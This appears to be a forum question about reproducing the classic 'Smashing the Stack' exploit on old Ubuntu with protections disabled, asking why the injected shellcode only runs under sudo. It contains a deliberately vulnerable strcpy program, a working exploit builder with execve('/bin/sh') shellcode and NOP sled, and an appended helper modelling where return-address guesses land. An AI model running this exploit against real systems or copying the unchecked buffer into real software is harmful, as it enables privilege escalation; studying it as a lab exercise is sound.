
Instructions in C buffer being executed only as sudo

<p>I'm working on a buffer overflow attack as described in Aleph One's article <a href="http://www.phrack.org/archives/49/p49_0x0e_Smashing%20The%20Stack%20For%20Fun%20And%20Profit_by_Aleph1.txt" rel="nofollow">Smashing the Stack for Fun and Profit</a>.</p>

<p>As proposed in the article, I've written a program (shellcode.c) that plants the malicious code (shellcode) into an environment variable ($EGG), after which $EGG is passed as an argument to the program (vulnerable.c) that I wish to attack, causing a buffer in that program to overflow and resulting in execution of the shellcode.</p>

<p>This is what the buffer looks like:</p>

<p>[NNNNNNNNN...NNNNNNSSSSSSS...SSSSSSSRRRRR...RRRRRR]</p>

<p>where N is the NOP instruction (see <a href="http://en.wikipedia.org/wiki/NOP_slide" rel="nofollow">NOP sled</a>), S is my shellcode, and R is an address (a return address into the buffer that will cause the instruction pointer to jump from the code segment into the above stack buffer and begin executing instructions).</p>

<p><strong>When I run the executables of shellcode.c and vulnerable.c as a normal user, I face the following problem:</strong> when the instruction pointer is redirected into the buffer and encounters an instruction, a segmentation fault results. <strong>However, upon executing the programs as sudo</strong>, the instructions in the buffer are executed without any problems and the subsequent shellcode in the buffer is successfully executed, bringing up a root terminal and thus completing the exploit.</p>

<p><strong>Can anyone shed light on why this could be happening?</strong></p>

<p>I have disabled the following protections: <em>Stack Smashing Protection</em>, <em>ASLR</em> and <em>Linux's NX</em> (eXecute Disable Bit).</p>

<p>I am compiling using gcc 4.4.3 (Target: i486-linux-gnu) and executing on Ubuntu 10.04 (Lucid Lynx) running kernel 2.6.32.</p>

<p>The following are my two programs:</p>

<p><strong>vulnerable.c</strong></p>

<pre><code>#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

/* Deliberately vulnerable: strcpy() copies argv[1] into a fixed 512-byte
   stack buffer with no length check, so a long argument overwrites the
   saved return address. */
int main(int argc, char **argv)
{
    char buffer[512];

    if (argc &gt; 1)
        strcpy(buffer, argv[1]);
    return EXIT_SUCCESS;
}
</code></pre>

<p><strong>shellcode.c</strong></p>

<pre><code>#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

/* The definitions below are not shown in the post; they are assumed here,
   following the values used in Aleph One's article. */
#define DEFAULT_OFFSET 0
#define DEFAULT_SIZE   512
#define NOP            0x90

/* Assumed: the post does not show its shellcode string. This is the
   execve("/bin/sh") shellcode from Aleph One's article. */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Assumed: returns the current stack pointer (%esp on the i486 target),
   like get_sp() in the article. */
unsigned long getStackPointer(void)
{
    unsigned long sp;
    __asm__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

int main(int argc, char **argv)
{
    char *buff, *ptr;
    int *addr, retaddr;
    int i;
    int offset = DEFAULT_OFFSET;
    int buffersize = DEFAULT_SIZE;

    /* Set buffersize and predicted offset if arguments are supplied to the program */
    if (argc &gt; 1)
        buffersize = atoi(argv[1]);
    if (argc &gt; 2)
        offset = atoi(argv[2]);

    if (!(buff = (char *)malloc(buffersize))) {
        printf("Can't allocate memory!");
        exit(1);
    }

    /* Guess where the egg will sit on the victim's stack: current SP minus offset */
    retaddr = getStackPointer() - offset;
    printf("%d\n", (int)strlen(shellcode));
    printf("Using address: 0x%x\n", retaddr);

    /* Fill the whole buffer with the guessed return address ... */
    addr = (int *)buff;
    for (i = 0; i &lt; buffersize; i += 4)
        *(addr++) = retaddr;

    /* ... overwrite the first half with a NOP sled ... */
    for (i = 0; i &lt; buffersize / 2; i++)
        buff[i] = NOP;

    /* ... and place the shellcode centred on the midpoint */
    ptr = buff + ((buffersize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i &lt; strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[buffersize - 1] = '\0';
    memcpy(buff, "EGG=", 4);   /* turns the buffer into the string "EGG=..." */
    putenv(buff);
    system("/bin/bash");       /* the shell and its children inherit $EGG */
    return EXIT_SUCCESS;
}
</code></pre>
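An added example, not part of the original post and not the poster's code: a small model of the egg layout described above ([NOP sled][shellcode][return addresses]) that classifies where a guessed return address would land and simulates sliding down the sled. It assumes 32-bit addresses (the post targets i486), NOP = 0x90, and the "EGG=" prefix and trailing NUL exactly as shellcode.c lays them out; the egg address 0xbffff800, the guessed addresses and the 0xCC placeholder shellcode bytes are all constructed values, not anything from the post. A check of this kind is worth running for both invocations, since the environment the victim process inherits, and therefore where $EGG sits on its stack, need not be the same under sudo as under a normal shell.

```c
/*
 * Added example (not the poster's code): model the egg layout from the post,
 *   [NOP sled][shellcode][return addresses]
 * and check where a guessed return address would land. Assumptions: 32-bit
 * addresses (i486 target), NOP = 0x90, "EGG=" prefix and trailing NUL as in
 * shellcode.c. The egg address, guesses and shellcode bytes are constructed.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90

enum landing { LANDS_OUTSIDE, LANDS_IN_SLED, LANDS_IN_SHELLCODE, LANDS_IN_RETADDRS };

/* Fill buf the way shellcode.c in the post does: the guessed return address in
 * every 4-byte slot, NOPs over the first half, the shellcode centred on the
 * midpoint, then "EGG=" over the first four bytes and a NUL at the end. */
void build_egg(unsigned char *buf, size_t buffersize, uint32_t retaddr,
               const unsigned char *shellcode, size_t shellcode_len)
{
    size_t i;
    for (i = 0; i + 4 <= buffersize; i += 4)
        memcpy(buf + i, &retaddr, 4);   /* host byte order (little-endian on x86) */
    for (i = 0; i < buffersize / 2; i++)
        buf[i] = NOP;
    memcpy(buf + (buffersize / 2 - shellcode_len / 2), shellcode, shellcode_len);
    buf[buffersize - 1] = '\0';
    memcpy(buf, "EGG=", 4);
}

/* Classify a guessed return address, given that the value of $EGG (the byte
 * after "EGG=") starts at egg_addr in the victim's address space. */
enum landing classify_guess(uint32_t egg_addr, size_t buffersize,
                            size_t shellcode_len, uint32_t guess)
{
    /* offsets are relative to the start of the value, which is buf + 4 */
    uint32_t shell_start = egg_addr + (buffersize / 2 - shellcode_len / 2) - 4;
    uint32_t shell_end   = shell_start + shellcode_len;
    uint32_t value_end   = egg_addr + buffersize - 5;   /* buf[buffersize-1] is the NUL */

    if (guess < egg_addr || guess >= value_end) return LANDS_OUTSIDE;
    if (guess < shell_start)                    return LANDS_IN_SLED;
    if (guess < shell_end)                      return LANDS_IN_SHELLCODE; /* mid-instruction: unreliable */
    return LANDS_IN_RETADDRS;
}

/* Simulate the CPU sliding down the sled from a landing offset inside buf:
 * returns the offset of the first non-NOP byte it would execute, or -1 if it
 * runs off the end of the buffer. */
long slide_from(const unsigned char *buf, size_t len, size_t land_off)
{
    size_t off = land_off;
    while (off < len && buf[off] == NOP)
        off++;
    return off < len ? (long)off : -1;
}

/* Build the constructed egg and confirm that every landing inside the sled
 * slides exactly to the first shellcode byte; returns 1 on success, else 0. */
int sled_reaches_shellcode(void)
{
    unsigned char shellcode[40];   /* constructed placeholder: 40 bytes of int3 */
    unsigned char egg[512];
    size_t shell_off = sizeof egg / 2 - sizeof shellcode / 2;   /* 236 */
    size_t off;

    memset(shellcode, 0xcc, sizeof shellcode);
    build_egg(egg, sizeof egg, 0xbffff880u, shellcode, sizeof shellcode);
    for (off = 4; off < shell_off; off++)
        if (slide_from(egg, sizeof egg, off) != (long)shell_off)
            return 0;
    return slide_from(egg, sizeof egg, shell_off) == (long)shell_off;
}

int main(void)
{
    uint32_t egg_addr = 0xbffff800u;   /* assumed: where $EGG's value lands in the victim */
    uint32_t guesses[] = { 0xbffff7f0u, 0xbffff880u, 0xbffff8e8u, 0xbffff990u };
    const char *names[] = { "outside", "NOP sled", "inside shellcode", "return addresses" };
    size_t i;

    for (i = 0; i < sizeof guesses / sizeof guesses[0]; i++)
        printf("guess 0x%08x lands: %s\n", (unsigned)guesses[i],
               names[classify_guess(egg_addr, 512, 40, guesses[i])]);
    printf("every sled landing slides to the shellcode: %s\n",
           sled_reaches_shellcode() ? "yes" : "no");
    return 0;
}
```

The classification is what you would compare between the two runs: print the address that `getenv("EGG")` returns inside the victim (or read it from a core dump) and feed it in as `egg_addr` together with the `retaddr` that shellcode.c printed. A guess that lands in the sled slides into the shellcode; one that lands inside the shellcode or outside the egg is the kind of thing that shows up as a segmentation fault.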
 
